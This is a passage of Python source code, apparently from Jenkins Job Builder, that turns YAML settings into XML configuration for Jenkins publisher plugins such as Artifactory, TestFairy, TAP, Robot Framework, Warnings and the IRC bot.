XML.SubElement(p, 'notFailBuild').text = 'true'
else:
XML.SubElement(p, 'notFailBuild').text = 'false'
def maven_deploy(parser, xml_parent, data):
"""yaml: maven-deploy
Deploy artifacts to Maven repository.
:arg str id: Repository ID
:arg str url: Repository URL (optional)
:arg bool unique-version: Assign unique versions to snapshots
(default true)
:arg bool deploy-unstable: Deploy even if the build is unstable
(default false)
:arg str release-env-var: If the given variable name is set to "true",
the deploy steps are skipped. (optional)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/maven-deploy001.yaml
:language: yaml
"""
p = XML.SubElement(xml_parent, 'hudson.maven.RedeployPublisher')
if 'id' in data:
XML.SubElement(p, 'id').text = data['id']
if 'url' in data:
XML.SubElement(p, 'url').text = data['url']
XML.SubElement(p, 'uniqueVersion').text = str(
data.get('unique-version', True)).lower()
XML.SubElement(p, 'evenIfUnstable').text = str(
data.get('deploy-unstable', False)).lower()
if 'release-env-var' in data:
XML.SubElement(p, 'releaseEnvVar').text = data['release-env-var']
def artifactory(parser, xml_parent, data):
"""yaml: artifactory
Uses/requires the Artifactory plugin to deploy artifacts to
Artifactory Server.
Requires the Jenkins :jenkins-wiki:`Artifactory Plugin
<Artifactory+Plugin>`.
:arg str url: Artifactory server url (default '')
:arg str name: Artifactory user with permissions use for
connected to the selected Artifactory Server (default '')
:arg str release-repo-key: Release repository name (default '')
:arg str snapshot-repo-key: Snapshots repository name (default '')
:arg bool publish-build-info: Push build metadata with artifacts
(default false)
:arg bool discard-old-builds:
Remove older build info from Artifactory (default false)
:arg bool discard-build-artifacts:
Remove older build artifacts from Artifactory (default false)
:arg bool even-if-unstable: Deploy artifacts even when the build
is unstable (default false)
:arg bool run-checks: Run automatic license scanning check after the
build is complete (default false)
:arg bool include-publish-artifacts: Include the build's published
module artifacts in the license violation checks if they are
also used as dependencies for other modules in this build
(default false)
:arg bool pass-identified-downstream: When true, a build parameter
named ARTIFACTORY_BUILD_ROOT with a value of
${JOB_NAME}-${BUILD_NUMBER} will be sent to downstream builds
(default false)
:arg bool license-auto-discovery: Tells Artifactory not to try
and automatically analyze and tag the build's dependencies
with license information upon deployment (default true)
:arg bool enable-issue-tracker-integration: When the Jenkins
JIRA plugin is enabled, synchronize information about JIRA
issues to Artifactory and attach issue information to build
artifacts (default false)
:arg bool aggregate-build-issues: When the Jenkins JIRA plugin
is enabled, include all issues from previous builds up to the
latest build status defined in "Aggregation Build Status"
(default false)
:arg bool allow-promotion-of-non-staged-builds: The build
promotion operation will be available to all successful builds
instead of only staged ones (default false)
:arg bool filter-excluded-artifacts-from-build: Add the excluded
files to the excludedArtifacts list and remove them from the
artifacts list in the build info (default false)
:arg str scopes: A list of dependency scopes/configurations to run
license violation checks on. If left empty all dependencies from
all scopes will be checked (default '')
:arg str violation-recipients: Recipients that need to be notified
of license violations in the build info (default '')
:arg list matrix-params: Semicolon-separated list of properties to
attach to all deployed artifacts in addition to the default ones:
build.name, build.number, and vcs.revision (default [])
:arg str black-duck-app-name: The existing Black Duck Code Center
application name (default '')
:arg str black-duck-app-version: The existing Black Duck Code Center
application version (default '')
:arg str black-duck-report-recipients: Recipients that will be emailed
a report after the automatic Black Duck Code Center compliance checks
finished (default '')
:arg str black-duck-scopes: A list of dependency scopes/configurations
to run Black Duck Code Center compliance checks on. If left empty
all dependencies from all scopes will be checked (default '')
:arg bool black-duck-run-checks: Automatic Black Duck Code Center
compliance checks will occur after the build completes
(default false)
:arg bool black-duck-include-published-artifacts: Include the build's
published module artifacts in the license violation checks if they
are also used as dependencies for other modules in this build
(default false)
:arg bool auto-create-missing-component-requests: Auto create
missing components in Black Duck Code Center application after
the build is completed and deployed in Artifactory
(default true)
:arg bool auto-discard-stale-component-requests: Auto discard
stale components in Black Duck Code Center application after
the build is completed and deployed in Artifactory
(default true)
:arg bool deploy-artifacts: Push artifacts to the Artifactory
Server. Use deployment-include-patterns and
deployment-exclude-patterns to filter deploy artifacts. (default true)
:arg list deployment-include-patterns: New line or comma separated mappings
of build artifacts to published artifacts. Supports Ant-style wildcards
mapping to target directories. E.g.: */*.zip=>dir (default [])
:arg list deployment-exclude-patterns: New line or comma separated patterns
for excluding artifacts from deployment to Artifactory (default [])
:arg bool env-vars-include: Include all environment variables
accessible by the build process. Jenkins-specific env variables
are always included. Use env-vars-include-patterns and
env-vars-exclude-patterns to filter variables to publish,
(default false)
:arg list env-vars-include-patterns: Comma or space-separated list of
environment variables that will be included as part of the published
build info. Environment variables may contain the * and the ? wildcards
(default [])
:arg list env-vars-exclude-patterns: Comma or space-separated list of
environment variables that will be excluded from the published
build info (default [])
Example:
.. literalinclude:: /../../tests/publishers/fixtures/artifactory01.yaml
.. literalinclude:: /../../tests/publishers/fixtures/artifactory02.yaml
"""
artifactory = XML.SubElement(
xml_parent, 'org.jfrog.hudson.ArtifactoryRedeployPublisher')
# optional_props
helpers.artifactory_optional_props(artifactory, data, 'publishers')
XML.SubElement(artifactory, 'matrixParams').text = ','.join(
data.get('matrix-params', []))
# details
details = XML.SubElement(artifactory, 'details')
helpers.artifactory_common_details(details, data)
XML.SubElement(details, 'repositoryKey').text = data.get(
'release-repo-key', '')
XML.SubElement(details, 'snapshotsRepositoryKey').text = data.get(
'snapshot-repo-key', '')
plugin = XML.SubElement(details, 'stagingPlugin')
XML.SubElement(plugin, 'pluginName').text = 'None'
# artifactDeploymentPatterns
helpers.artifactory_deployment_patterns(artifactory, data)
# envVarsPatterns
helpers.artifactory_env_vars_patterns(artifactory, data)
def test_fairy(parser, xml_parent, data):
"""yaml: test-fairy
This plugin helps you to upload Android APKs or iOS IPA files to
www.testfairy.com.
Requires the Jenkins :jenkins-wiki:`Test Fairy Plugin
<TestFairy+Plugin>`.
:arg str platform: Select platform to upload to, **android** or **ios**
(required)
Android Only:
:arg str proguard-file: Path to Proguard file. Path of mapping.txt from
your proguard output directory. (default '')
:arg str storepass: Password for the keystore (default android)
:arg str alias: alias for key (default androiddebugkey)
:arg str keypass: password for the key (default '')
:arg str keystorepath: Path to Keystore file (required)
IOS Only:
:arg str dSYM-file: Path to .dSYM.zip file (default '')
All:
:arg str apikey: TestFairy API_KEY. Find it in your TestFairy account
settings (required)
:arg str appfile: Path to App file (.apk) or (.ipa). For example:
$WORKSPACE/[YOUR_FILE_NAME].apk or full path to the apk file.
(required)
:arg str tester-groups: Tester groups to notify (default '')
:arg bool notify-testers: Send email with changelogs to testers
(default false)
:arg bool autoupdate: Automatic update (default false)
:arg str max-duration: Duration of the session (default 10m)
:arg bool record-on-background: Record on background (default false)
:arg bool data-only-wifi: Record data only in wifi (default false)
:arg bool video-enabled: Record video (default true)
:arg str screenshot-interval: Time interval between screenshots
(default 1)
:arg str video-quality: Video quality (default high)
:arg bool cpu: Enable CPU metrics (default true)
:arg bool memory: Enable memory metrics (default true)
:arg bool logs: Enable logs metrics (default true)
:arg bool network: Enable network metrics (default false)
:arg bool phone-signal: Enable phone signal metrics (default false)
:arg bool wifi: Enable wifi metrics (default false)
:arg bool gps: Enable gps metrics (default false)
:arg bool battery: Enable battery metrics (default false)
:arg bool opengl: Enable opengl metrics (default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-android-minimal.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-android001.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-ios-minimal.yaml
:language: yaml
.. literalinclude::
/../../tests/publishers/fixtures/test-fairy-ios001.yaml
:language: yaml
"""
platform = data.get('platform')
valid_platforms = ['android', 'ios']
if 'platform' not in data:
raise MissingAttributeError('platform')
if platform == 'android':
root = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.testfairy.TestFairyAndroidRecorder')
helpers.test_fairy_common(root, data)
mappings = [
('proguard-file', 'mappingFile', ''),
('keystorepath', 'keystorePath', None),
('storepass', 'storepass', 'android'),
('alias', 'alias', 'androiddebugkey'),
('keypass', 'keypass', '')]
helpers.convert_mapping_to_xml(
root, data, mappings, fail_required=True)
elif platform == 'ios':
root = XML.SubElement(
xml_parent, 'org.jenkinsci.plugins.testfairy.TestFairyIosRecorder')
helpers.test_fairy_common(root, data)
mappings = [('dSYM-file', 'mappingFile', '')]
helpers.convert_mapping_to_xml(
root, data, mappings, fail_required=True)
else:
raise InvalidAttributeError('platform', platform, valid_platforms)
def text_finder(parser, xml_parent, data):
"""yaml: text-finder
This plugin lets you search keywords in the files you specified and
additionally check build status
Requires the Jenkins :jenkins-wiki:`Text-finder Plugin
<Text-finder+Plugin>`.
:arg str regexp: Specify a regular expression
:arg str fileset: Specify the path to search
:arg bool also-check-console-output:
Search the console output (default false)
:arg bool succeed-if-found:
Force a build to succeed if a string was found (default false)
:arg bool unstable-if-found:
Set build unstable instead of failing the build (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/text-finder001.yaml
:language: yaml
"""
finder = XML.SubElement(xml_parent,
'hudson.plugins.textfinder.TextFinderPublisher')
if ('fileset' in data):
XML.SubElement(finder, 'fileSet').text = data['fileset']
XML.SubElement(finder, 'regexp').text = data['regexp']
check_output = str(data.get('also-check-console-output', False)).lower()
XML.SubElement(finder, 'alsoCheckConsoleOutput').text = check_output
succeed_if_found = str(data.get('succeed-if-found', False)).lower()
XML.SubElement(finder, 'succeedIfFound').text = succeed_if_found
unstable_if_found = str(data.get('unstable-if-found', False)).lower()
XML.SubElement(finder, 'unstableIfFound').text = unstable_if_found
def html_publisher(parser, xml_parent, data):
"""yaml: html-publisher
This plugin publishes HTML reports.
Requires the Jenkins :jenkins-wiki:`HTML Publisher Plugin
<HTML+Publisher+Plugin>`.
:arg str name: Report name
:arg str dir: HTML directory to archive
:arg str files: Specify the pages to display
:arg bool keep-all: keep HTML reports for each past build (default false)
:arg bool allow-missing: Allow missing HTML reports (default false)
:arg bool link-to-last-build: If this and 'keep-all' both are true, it
publishes the link on project level even if build failed.
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/html-publisher001.yaml
:language: yaml
"""
reporter = XML.SubElement(xml_parent, 'htmlpublisher.HtmlPublisher')
targets = XML.SubElement(reporter, 'reportTargets')
ptarget = XML.SubElement(targets, 'htmlpublisher.HtmlPublisherTarget')
XML.SubElement(ptarget, 'reportName').text = data['name']
XML.SubElement(ptarget, 'reportDir').text = data['dir']
XML.SubElement(ptarget, 'reportFiles').text = data['files']
XML.SubElement(ptarget, 'alwaysLinkToLastBuild').text = str(
data.get('link-to-last-build', False)).lower()
keep_all = str(data.get('keep-all', False)).lower()
XML.SubElement(ptarget, 'keepAll').text = keep_all
allow_missing = str(data.get('allow-missing', False)).lower()
XML.SubElement(ptarget, 'allowMissing').text = allow_missing
XML.SubElement(ptarget, 'wrapperName').text = "htmlpublisher-wrapper.html"
def rich_text_publisher(parser, xml_parent, data):
"""yaml: rich-text-publisher
This plugin puts custom rich text message to the Build pages and Job main
page.
Requires the Jenkins :jenkins-wiki:`Rich Text Publisher Plugin
<Rich+Text+Publisher+Plugin>`.
:arg str stable-text: The stable text
:arg str unstable-text: The unstable text if different from stable
(default '')
:arg str failed-text: The failed text if different from stable (default '')
:arg str parser-name: HTML, Confluence or WikiText
Example:
.. literalinclude:: /../../tests/publishers/fixtures/richtext001.yaml
:language: yaml
"""
parsers = ['HTML', 'Confluence', 'WikiText']
parser_name = data['parser-name']
if parser_name not in parsers:
raise JenkinsJobsException('parser-name must be one of: %s' %
", ".join(parsers))
reporter = XML.SubElement(
xml_parent,
'org.korosoft.jenkins.plugin.rtp.RichTextPublisher')
XML.SubElement(reporter, 'stableText').text = data['stable-text']
XML.SubElement(reporter, 'unstableText').text =\
data.get('unstable-text', '')
XML.SubElement(reporter, 'failedText').text = data.get('failed-text', '')
XML.SubElement(reporter, 'unstableAsStable').text =\
'False' if data.get('unstable-text', '') else 'True'
XML.SubElement(reporter, 'failedAsStable').text =\
'False' if data.get('failed-text', '') else 'True'
XML.SubElement(reporter, 'parserName').text = parser_name
def tap(parser, xml_parent, data):
"""yaml: tap
Adds support to TAP test result files
Requires the Jenkins :jenkins-wiki:`TAP Plugin <TAP+Plugin>`.
:arg str results: TAP test result files (required)
:arg bool fail-if-no-results: Fail if no result (default false)
:arg bool failed-tests-mark-build-as-failure:
Mark build as failure if test fails (default false)
:arg bool output-tap-to-console: Output tap to console (default true)
:arg bool enable-subtests: Enable subtests (default true)
:arg bool discard-old-reports: Discard old reports (default false)
:arg bool todo-is-failure: Handle TODO's as failures (default true)
:arg bool include-comment-diagnostics: Include comment diagnostics (#) in
the results table (>=1.12) (default false)
:arg bool validate-tests: Validate number of tests (>=1.13) (default false)
:arg bool plan-required: TAP plan required? (>=1.17) (default true)
:arg bool verbose: Print a message for each TAP stream file (>=1.17)
(default true)
:arg bool show-only-failures: show only test failures (>=1.17)
(default false)
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/tap-full.yaml
:language: yaml
Minimal Example:
.. literalinclude:: /../../tests/publishers/fixtures/tap-minimal.yaml
:language: yaml
"""
tap = XML.SubElement(xml_parent, 'org.tap4j.plugin.TapPublisher')
tap.set('plugin', 'tap')
mappings = [
('results', 'testResults', None),
('fail-if-no-results', 'failIfNoResults', False),
('failed-tests-mark-build-as-failure',
'failedTestsMarkBuildAsFailure',
False),
('output-tap-to-console', 'outputTapToConsole', True),
('enable-subtests', 'enableSubtests', True),
('discard-old-reports', 'discardOldReports', False),
('todo-is-failure', 'todoIsFailure', True),
('include-comment-diagnostics', 'includeCommentDiagnostics', False),
('validate-tests', 'validateNumberOfTests', False),
('plan-required', 'planRequired', True),
('verbose', 'verbose', True),
('show-only-failures', 'showOnlyFailures', False),
]
helpers.convert_mapping_to_xml(tap, data, mappings, fail_required=True)
def post_tasks(parser, xml_parent, data):
"""yaml: post-tasks
Adds support to post build task plugin
Requires the Jenkins :jenkins-wiki:`Post Build Task plugin
<Post+build+task>`.
:arg dict task: Post build task definition
:arg list task[matches]: list of matches when to run the task
:arg dict task[matches][*]: match definition
:arg str task[matches][*][log-text]: text to match against the log
:arg str task[matches][*][operator]: operator to apply with the next match
:task[matches][*][operator] values (default 'AND'):
* **AND**
* **OR**
:arg bool task[escalate-status]: Escalate the task status to the job
(default 'false')
:arg bool task[run-if-job-successful]: Run only if the job was successful
(default 'false')
:arg str task[script]: Shell script to run (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/post-tasks001.yaml
:language: yaml
"""
pb_xml = XML.SubElement(xml_parent,
'hudson.plugins.postbuildtask.PostbuildTask')
tasks_xml = XML.SubElement(pb_xml, 'tasks')
for task in data:
task_xml = XML.SubElement(
tasks_xml,
'hudson.plugins.postbuildtask.TaskProperties')
matches_xml = XML.SubElement(task_xml, 'logTexts')
for match in task.get('matches', []):
lt_xml = XML.SubElement(
matches_xml,
'hudson.plugins.postbuildtask.LogProperties')
XML.SubElement(lt_xml, 'logText').text = str(
match.get('log-text', False) or '')
XML.SubElement(lt_xml, 'operator').text = str(
match.get('operator', 'AND')).upper()
XML.SubElement(task_xml, 'EscalateStatus').text = str(
task.get('escalate-status', False)).lower()
XML.SubElement(task_xml, 'RunIfJobSuccessful').text = str(
task.get('run-if-job-successful', False)).lower()
XML.SubElement(task_xml, 'script').text = str(
task.get('script', ''))
def postbuildscript(parser, xml_parent, data):
"""yaml: postbuildscript
Executes additional builders, script or Groovy after the build is
complete.
Requires the Jenkins :jenkins-wiki:`Post Build Script plugin
<PostBuildScript+Plugin>`.
:arg list generic-script: Paths to Batch/Shell scripts
:arg list groovy-script: Paths to Groovy scripts
:arg list groovy: Inline Groovy
:arg list builders: Any supported builders, see :doc:`builders`.
:arg bool onsuccess: Deprecated, replaced with script-only-if-succeeded
:arg bool script-only-if-succeeded: Scripts and builders are run only if
the build succeeded (default true)
:arg bool onfailure: Deprecated, replaced with script-only-if-failed
:arg bool script-only-if-failed: Scripts and builders are run only if the
build failed (default false)
:arg bool mark-unstable-if-failed: Build will be marked unstable
if job will be successfully completed
but publishing script will return
non zero exit code (default false)
:arg str execute-on: For matrix projects, scripts can be run after each
axis is built (`axes`), after all axis of the matrix
are built (`matrix`) or after each axis AND the matrix
are built (`both`).
The `script-only-if-succeeded` and `bool script-only-if-failed` options are
confusing. If you want the post build to always run regardless of the build
status, you should set them both to `false`.
Example:
.. literalinclude::
/../../tests/publishers/fixtures/postbuildscript001.yaml
:language: yaml
You can also execute :doc:`builders </builders>`:
.. literalinclude::
/../../tests/publishers/fixtures/postbuildscript002.yaml
:language: yaml
Run once after the whole matrix (all axes) is built:
.. literalinclude::
/../../tests/publishers/fixtures/postbuildscript003.yaml
:language: yaml
"""
pbs_xml = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.postbuildscript.PostBuildScript')
# Shell/Groovy in a file
script_types = {
'generic-script': 'GenericScript',
'groovy-script': 'GroovyScriptFile',
}
# Assuming yaml preserves order of input data make sure
# corresponding XML steps are generated in the same order
build_scripts = [(k, v) for k, v in data.items()
if k in script_types or k in ['groovy', 'builders']]
for step, script_data in build_scripts:
if step in script_types:
scripts_xml = XML.SubElement(pbs_xml, step[:-len('-script')] +
'ScriptFileList')
for shell_script in script_data:
script_xml = XML.SubElement(
scripts_xml,
'org.jenkinsci.plugins.postbuildscript.'
+ script_types[step])
file_path_xml = XML.SubElement(script_xml, 'filePath')
file_path_xml.text = shell_script
# Inlined Groovy
if step == 'groovy':
groovy_inline_xml = XML.SubElement(pbs_xml,
'groovyScriptContentList')
for groovy in script_data:
groovy_xml = XML.SubElement(
groovy_inline_xml,
'org.jenkinsci.plugins.postbuildscript.GroovyScriptContent'
)
groovy_content = XML.SubElement(groovy_xml, 'content')
groovy_content.text = groovy
# Inject builders
if step == 'builders':
build_steps_xml = XML.SubElement(pbs_xml, 'buildSteps')
for builder in script_data:
parser.registry.dispatch('builder', parser, build_steps_xml,
builder)
# When to run the build? Note the plugin let one specify both options
# although they are antinomic
# onsuccess and onfailure parameters are deprecated, this is to keep
# backwards compatability
success_xml = XML.SubElement(pbs_xml, 'scriptOnlyIfSuccess')
if 'script-only-if-succeeded' in data:
success_xml.text = str(data.get('script-only-if-succeeded',
True)).lower()
else:
success_xml.text = str(data.get('onsuccess', True)).lower()
failure_xml = XML.SubElement(pbs_xml, 'scriptOnlyIfFailure')
if 'script-only-if-failed' in data:
failure_xml.text = str(data.get('script-only-if-failed',
False)).lower()
else:
failure_xml.text = str(data.get('onfailure', False)).lower()
# Mark build unstable if publisher script return non zero exit code
XML.SubElement(pbs_xml, 'markBuildUnstable').text = str(
data.get('mark-unstable-if-failed', False)).lower()
# TODO: we may want to avoid setting "execute-on" on non-matrix jobs,
# either by skipping this part or by raising an error to let the user know
# an attempt was made to set execute-on on a non-matrix job. There are
# currently no easy ways to check for this though.
if 'execute-on' in data:
valid_values = ('matrix', 'axes', 'both')
execute_on = data['execute-on'].lower()
if execute_on not in valid_values:
raise JenkinsJobsException(
'execute-on must be one of %s, got %s' %
valid_values, execute_on
)
execute_on_xml = XML.SubElement(pbs_xml, 'executeOn')
execute_on_xml.text = execute_on.upper()
def xml_summary(parser, xml_parent, data):
"""yaml: xml-summary
Adds support for the Summary Display Plugin
Requires the Jenkins :jenkins-wiki:`Summary Display Plugin
<Summary+Display+Plugin>`.
:arg str files: Files to parse (default '')
:arg bool shown-on-project-page: Display summary on project page
(default 'false')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/xml-summary001.yaml
:language: yaml
"""
summary = XML.SubElement(xml_parent,
'hudson.plugins.summary__report.'
'ACIPluginPublisher')
XML.SubElement(summary, 'name').text = data['files']
XML.SubElement(summary, 'shownOnProjectPage').text = str(
data.get('shown-on-project-page', 'false'))
def robot(parser, xml_parent, data):
"""yaml: robot
Adds support for the Robot Framework Plugin
Requires the Jenkins :jenkins-wiki:`Robot Framework Plugin
<Robot+Framework+Plugin>`.
:arg str output-path: Path to directory containing robot xml and html files
relative to build workspace. (default '')
:arg str log-file-link: Name of log or report file to be linked on jobs
front page (default '')
:arg str report-html: Name of the html file containing robot test report
(default 'report.html')
:arg str log-html: Name of the html file containing detailed robot test log
(default 'log.html')
:arg str output-xml: Name of the xml file containing robot output
(default 'output.xml')
:arg str pass-threshold: Minimum percentage of passed tests to consider
the build successful (default 0.0)
:arg str unstable-threshold: Minimum percentage of passed test to
consider the build as not failed (default 0.0)
:arg bool only-critical: Take only critical tests into account when
checking the thresholds (default true)
:arg list other-files: list other files to archive (default '')
:arg bool archive-output-xml: Archive output xml file to server
(default true)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/robot001.yaml
:language: yaml
"""
parent = XML.SubElement(xml_parent, 'hudson.plugins.robot.RobotPublisher')
XML.SubElement(parent, 'outputPath').text = data['output-path']
XML.SubElement(parent, 'logFileLink').text = str(
data.get('log-file-link', ''))
XML.SubElement(parent, 'reportFileName').text = str(
data.get('report-html', 'report.html'))
XML.SubElement(parent, 'logFileName').text = str(
data.get('log-html', 'log.html'))
XML.SubElement(parent, 'outputFileName').text = str(
data.get('output-xml', 'output.xml'))
XML.SubElement(parent, 'passThreshold').text = str(
data.get('pass-threshold', 0.0))
XML.SubElement(parent, 'unstableThreshold').text = str(
data.get('unstable-threshold', 0.0))
XML.SubElement(parent, 'onlyCritical').text = str(
data.get('only-critical', True)).lower()
other_files = XML.SubElement(parent, 'otherFiles')
for other_file in data['other-files']:
XML.SubElement(other_files, 'string').text = str(other_file)
XML.SubElement(parent, 'disableArchiveOutput').text = str(
not data.get('archive-output-xml', True)).lower()
def warnings(parser, xml_parent, data):
"""yaml: warnings
Generate trend report for compiler warnings in the console log or
in log files. Requires the Jenkins :jenkins-wiki:`Warnings Plugin
<Warnings+Plugin>`.
:arg list console-log-parsers: The parser to use to scan the console
log (default '')
:arg dict workspace-file-scanners:
:workspace-file-scanners:
* **file-pattern** (`str`) -- Fileset 'includes' setting that
specifies the files to scan for warnings
* **scanner** (`str`) -- The parser to use to scan the files
provided in workspace-file-pattern (default '')
:arg str files-to-include: Comma separated list of regular
expressions that specifies the files to include in the report
(based on their absolute filename). By default all files are
included
:arg str files-to-ignore: Comma separated list of regular expressions
that specifies the files to exclude from the report (based on their
absolute filename). (default '')
:arg bool run-always: By default, this plug-in runs only for stable or
unstable builds, but not for failed builds. Set to true if the
plug-in should run even for failed builds. (default false)
:arg bool detect-modules: Determines if Ant or Maven modules should be
detected for all files that contain warnings. Activating this
option may increase your build time since the detector scans
the whole workspace for 'build.xml' or 'pom.xml' files in order
to assign the correct module names. (default false)
:arg bool resolve-relative-paths: Determines if relative paths in
warnings should be resolved using a time expensive operation that
scans the whole workspace for matching files. Deactivate this
option if you encounter performance problems. (default false)
:arg int health-threshold-high: The upper threshold for the build
health. If left empty then no health report is created. If
the actual number of warnings is between the provided
thresholds then the build health is interpolated (default '')
:arg int health-threshold-low: The lower threshold for the build
health. See health-threshold-high. (default '')
:arg dict health-priorities: Determines which warning priorities
should be considered when evaluating the build health (default
all-priorities)
:health-priorities values:
* **priority-high** -- Only priority high
* **high-and-normal** -- Priorities high and normal
* **all-priorities** -- All priorities
:arg dict total-thresholds: If the number of total warnings is greater
than one of these thresholds then a build is considered as unstable
or failed, respectively. (default '')
:total-thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
:arg dict new-thresholds: If the specified number of new warnings exceeds
one of these thresholds then a build is considered as unstable or
failed, respectively. (default '')
:new-thresholds:
* **unstable** (`dict`)
:unstable: * **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-high** (`int`)
:arg bool use-delta-for-new-warnings: If set then the number of new
warnings is calculated by subtracting the total number of warnings
of the current build from the reference build. This may lead to wrong
results if you have both fixed and new warnings in a build. If not set,
then the number of new warnings is calculated by an asymmetric set
difference of the warnings in the current and reference build. This
will find all new warnings even if the number of total warnings is
decreasing. However, sometimes false positives will be reported due
to minor changes in a warning (refactoring of variable of method
names, etc.) (default false)
:arg bool use-previous-build-as-reference: If set the number of new
warnings will always be computed based on the previous build, even if
that build is unstable (due to a violated warning threshold).
Otherwise the last build that did not violate any given threshold will
be used as
reference. It is recommended to uncheck this option if the plug-in
should ensure that all new warnings will be finally fixed in subsequent
builds. (default false)
:arg bool only-use-stable-builds-as-reference: The number of new warnings
will be calculated based on the last stable build, allowing reverts
of unstable builds where the number of warnings was decreased.
(default false)
:arg str default-encoding: Default encoding when parsing or showing files
Leave empty to use default encoding of platform (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/warnings001.yaml
:language: yaml
"""
warnings = XML.SubElement(xml_parent,
'hudson.plugins.warnings.'
'WarningsPublisher')
console = XML.SubElement(warnings, 'consoleParsers')
for parser in data.get('console-log-parsers', []):
console_parser = XML.SubElement(console,
'hudson.plugins.warnings.'
'ConsoleParser')
XML.SubElement(console_parser, 'parserName').text = parser
workspace = XML.SubElement(warnings, 'parserConfigurations')
for wfs in data.get('workspace-file-scanners', []):
workspace_pattern = XML.SubElement(workspace,
'hudson.plugins.warnings.'
'ParserConfiguration')
XML.SubElement(workspace_pattern, 'pattern').text = \
wfs['file-pattern']
XML.SubElement(workspace_pattern, 'parserName').text = \
wfs['scanner']
warnings_to_include = data.get('files-to-include', '')
XML.SubElement(warnings, 'includePattern').text = warnings_to_include
warnings_to_ignore = data.get('files-to-ignore', '')
XML.SubElement(warnings, 'excludePattern').text = warnings_to_ignore
run_always = str(data.get('run-always', False)).lower()
XML.SubElement(warnings, 'canRunOnFailed').text = run_always
detect_modules = str(data.get('detect-modules', False)).lower()
XML.SubElement(warnings, 'shouldDetectModules').text = detect_modules
# Note the logic reversal (included here to match the GUI)
XML.SubElement(warnings, 'doNotResolveRelativePaths').text = \
str(not data.get('resolve-relative-paths', False)).lower()
health_threshold_high = str(data.get('health-threshold-high', ''))
XML.SubElement(warnings, 'healthy').text = health_threshold_high
health_threshold_low = str(data.get('health-threshold-low', ''))
XML.SubElement(warnings, 'unHealthy').text = health_threshold_low
prioritiesDict = {'priority-high': 'high',
'high-and-normal': 'normal',
'all-priorities': 'low'}
priority = data.get('health-priorities', 'all-priorities')
if priority not in prioritiesDict:
raise JenkinsJobsException("Health-Priority entered is not valid must "
"be one of: %s" %
",".join(prioritiesDict.keys()))
XML.SubElement(warnings, 'thresholdLimit').text = prioritiesDict[priority]
td = XML.SubElement(warnings, 'thresholds')
for base in ["total", "new"]:
thresholds = data.get("%s-thresholds" % base, {})
for status in ["unstable", "failed"]:
bystatus = thresholds.get(status, {})
for level in ["all", "high", "normal", "low"]:
val = str(bystatus.get("%s-%s" % (base, level), ''))
XML.SubElement(td, "%s%s%s" % (status,
base.capitalize(), level.capitalize())
).text = val
if data.get('new-thresholds'):
XML.SubElement(warnings, 'dontComputeNew').text = 'false'
delta = data.get('use-delta-for-new-warnings', False)
XML.SubElement(warnings, 'useDeltaValues').text = str(delta).lower()
use_previous_build = data.get('use-previous-build-as-reference', False)
XML.SubElement(warnings, 'usePreviousBuildAsReference').text = str(
use_previous_build).lower()
use_stable_builds = data.get('only-use-stable-builds-as-reference',
False)
XML.SubElement(warnings, 'useStableBuildAsReference').text = str(
use_stable_builds).lower()
else:
XML.SubElement(warnings, 'dontComputeNew').text = 'true'
XML.SubElement(warnings, 'useStableBuildAsReference').text = 'false'
XML.SubElement(warnings, 'useDeltaValues').text = 'false'
encoding = data.get('default-encoding', '')
XML.SubElement(warnings, 'defaultEncoding').text = encoding
def sloccount(parser, xml_parent, data):
"""yaml: sloccount
Generates the trend report for SLOCCount
Requires the Jenkins :jenkins-wiki:`SLOCCount Plugin <SLOCCount+Plugin>`.
:arg str report-files: Setting that specifies the generated raw
SLOCCount report files.
Be sure not to include any non-report files into
this pattern. The report files must have been
generated by sloccount using the
"--wide --details" options.
(default '\*\*/sloccount.sc')
:arg str charset: The character encoding to be used to read the SLOCCount
result files. (default 'UTF-8')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/sloccount001.yaml
:language: yaml
"""
top = XML.SubElement(xml_parent,
'hudson.plugins.sloccount.SloccountPublisher')
XML.SubElement(top, 'pattern').text = data.get('report-files',
'**/sloccount.sc')
XML.SubElement(top, 'encoding').text = data.get('charset', 'UTF-8')
def ircbot(parser, xml_parent, data):
"""yaml: ircbot
ircbot enables Jenkins to send build notifications via IRC and lets you
interact with Jenkins via an IRC bot.
Requires the Jenkins :jenkins-wiki:`IRC Plugin <IRC+Plugin>`.
:arg string strategy: When to send notifications
:strategy values:
* **all** always (default)
* **any-failure** on any failure
* **failure-and-fixed** on failure and fixes
* **new-failure-and-fixed** on new failure and fixes
* **statechange-only** only on state change
:arg bool notify-start: Whether to send notifications to channels when a
build starts
(default false)
:arg bool notify-committers: Whether to send notifications to the users
that are suspected of having broken this build
(default false)
:arg bool notify-culprits: Also send notifications to 'culprits' from
previous unstable/failed builds
(default false)
:arg bool notify-upstream: Whether to send notifications to upstream
committers if no committers were found for a
broken build
(default false)
:arg bool notify-fixers: Whether to send notifications to the users that
have fixed a broken build
(default false)
:arg string message-type: Channel Notification Message.
:message-type values:
* **summary-scm** for summary and SCM changes (default)
* **summary** for summary only
* **summary-params** for summary and build parameters
* **summary-scm-fail** for summary, SCM changes, failures)
:arg list channels: list channels definitions
If empty, it takes channel from Jenkins configuration.
(default empty)
WARNING: the IRC plugin requires the channel to be
configured in the system wide configuration or the jobs
will fail to emit notifications to the channel
:Channel: * **name** (`str`) Channel name
* **password** (`str`) Channel password (optional)
* **notify-only** (`bool`) Set to true if you want to
